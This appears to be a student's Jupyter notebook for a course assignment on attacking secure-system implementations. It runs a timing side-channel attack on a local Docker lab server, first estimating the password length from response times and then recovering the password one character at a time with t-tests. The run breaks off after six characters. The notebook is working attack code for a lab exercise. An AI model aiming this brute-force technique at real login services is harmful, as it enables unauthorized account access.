# Attacks on Implementations of Secure Systems Assignment 1

## Commands used for docker
`docker pull amarmic/attacks_on_implementations:Assignment1_x86_64`  
`docker run --name ass1 -p 80:8080 amarmic/attacks_on_implementations:Assignment1_x86_64`

## Commands used for Anaconda to test locally
`conda create --name side_attacks python=3.12`
`conda install requests`

### Imports

In [33]:
!pip install scipy

   ---------------------------------------- 0.0/40.9 MB ? eta -:--:--
    --------------------------------------- 0.5/40.9 MB 2.8 MB/s eta 0:00:15
   -- ------------------------------------- 2.1/40.9 MB 6.5 MB/s eta 0:00:06
   ---- ----------------------------------- 4.7/40.9 MB 9.2 MB/s eta 0:00:04
   ------- -------------------------------- 8.1/40.9 MB 11.4 MB/s eta 0:00:03
   ------------ --------------------------- 12.6/40.9 MB 13.6 MB/s eta 0:00:03
   ----------------- ---------------------- 17.8/40.9 MB 15.6 MB/s eta 0:00:02
   --------------------- ------------------ 21.5/40.9 MB 16.2 MB/s eta 0:00:02
   ------------------------ --------------- 24.9/40.9 MB 16.1 MB/s eta 0:00:01
   ---------------------------- ----------- 28.8/40.9 MB 16.6 MB/s eta 0:00:01
   -------------------------------- ------- 33.0/40.9 MB 16.9 MB/s eta 0:00:01
   ----------------------------------- ---- 36.7/40.9 MB 17.1 MB/s eta 0:00:01
   ---------------------------------------  40.9/40.9 MB 17.3 MB/s e

In [39]:
import requests
import time
from scipy import stats

### Constants

In [36]:
base_url = "http://localhost"
name = "208009845"
difficulty = "1" # const for first difficuly
max_password_length = 32
amount_of_repeats = 3
possible_chars = "abcdefghijklmnopqrstuvwxyz"

## Solution for difficulty 1
With difficulty 1, the password length is variable, so we need first to find the length.


In [29]:
password = "parshandata"
response = requests.get(f"{base_url}/?user={name}&password={password}")
print("Response: ", response.url)
if response.status_code != 200 : # sanity check
  print("Error: ", response.status_code)

if response.text == "1":
   print("correct password")
else:
   print("incorrect password")

Response:  http://localhost/?user=208009845&password=parshandata
correct password


In [30]:
# Find length of password
# here we save the time of the query for each password length
vector_iterations = [[] for _ in range(max_password_length-1)]
for password_length in range(1,max_password_length): 
  password = "a" * password_length
  for iteration in range(amount_of_repeats):
    start = time.time()
    response = requests.get(f"{base_url}/?user={name}&password={password}")#&difficulty={difficulty}")
    end = time.time()
    if response.status_code != 200: # sanity check
      print("Error: ", response.status_code)
      break
    time_of_query = end - start
    vector_iterations[password_length-1].append(time_of_query)

# calculate avg time for each password length
password_length, max_avg = 0, 0
for i in range(len(vector_iterations)):
  vector_iterations[i] = sum(vector_iterations[i]) / len(vector_iterations[i])
  if vector_iterations[i] > max_avg:
    max_avg = vector_iterations[i]
    password_length = i+1
  
print(f"Password length: {password_length}, Time: {vector_iterations[password_length-1]}")

Password length: 11, Time: 0.49216394424438475


In [45]:
password = ""
found_password = False 

while (len(password) <= password_length and found_password == False):
  vector_iterations = [[] for _ in range(len(possible_chars))]
  current_index_of_char = len(password) #what index we are trying to brute force
  for index_char_to_check in range(len(possible_chars)):
    password_to_check = password + possible_chars[index_char_to_check] * (password_length - current_index_of_char)
    for iteration in range(amount_of_repeats):
      start = time.time()
      response = requests.get(f"{base_url}/?user={name}&password={password_to_check}")#&difficulty={difficulty}")
      end = time.time()
      if response.status_code == 200 and response.text == "1":
        found_password = True
        break
      time_of_query = end - start
      vector_iterations[index_char_to_check].append(time_of_query)
    
  selected_char_index, selected_char_max_avg = 0, 0
  for i in range(len(vector_iterations)):
    vector_iterations[i] = sum(vector_iterations[i]) / len(vector_iterations[i])
    if vector_iterations[i] > selected_char_max_avg:
      selected_char_max_avg = vector_iterations[i]
      selected_char_index = i

  sample = vector_iterations[:selected_char_index] + vector_iterations[selected_char_index+1:]
  t_stat, p_val = stats.ttest_1samp(sample, vector_iterations[selected_char_index])
  
  # If p-value is very small, it's likely an outlier
  if p_val < 0.05:
      print(f"Password: {password}, Char: {possible_chars[selected_char_index]}, p-value: {p_val}")
      password += possible_chars[selected_char_index]
  else: #go back a letter      
      password = password[:-1]
      print("We did not find a char, the new password is: ", password)

print(f"Password: {password}")

Password: , Char: p, p-value: 5.3579488767940455e-42
Password: p, Char: a, p-value: 5.413175969410073e-39
Password: pa, Char: r, p-value: 2.7188522600549737e-36
Password: par, Char: s, p-value: 2.189661304843387e-34
Password: pars, Char: h, p-value: 6.431495428991424e-30
Password: parsh, Char: a, p-value: 6.804109058444716e-31


KeyboardInterrupt: 